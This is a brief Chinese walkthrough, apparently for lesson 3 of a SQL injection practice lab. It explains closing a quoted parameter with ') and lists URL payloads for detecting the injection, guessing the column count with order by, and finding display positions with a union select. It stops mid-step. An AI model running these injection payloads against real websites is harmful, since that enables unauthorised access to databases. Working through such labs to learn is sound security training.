·lesson 3 与第一二关不同的是,这一关是基于错误的get单引号变形字符型注入 要使用 ') 进行闭合 (ps:博主自己理解为字符型注入,是不过是需要加括号进行闭合,适用于博主自己的方便记忆的法子,仅供参考 ) 1.判断是否存在注入 ?id=') --+ 2.使用order by 猜测字段数 ?id=') order by 3 --+ ?id=') order by 4 --+ 3.确定显示的字段显示位 ?id=') and 1=2 union select 1,2,3 --+ 4.爆破…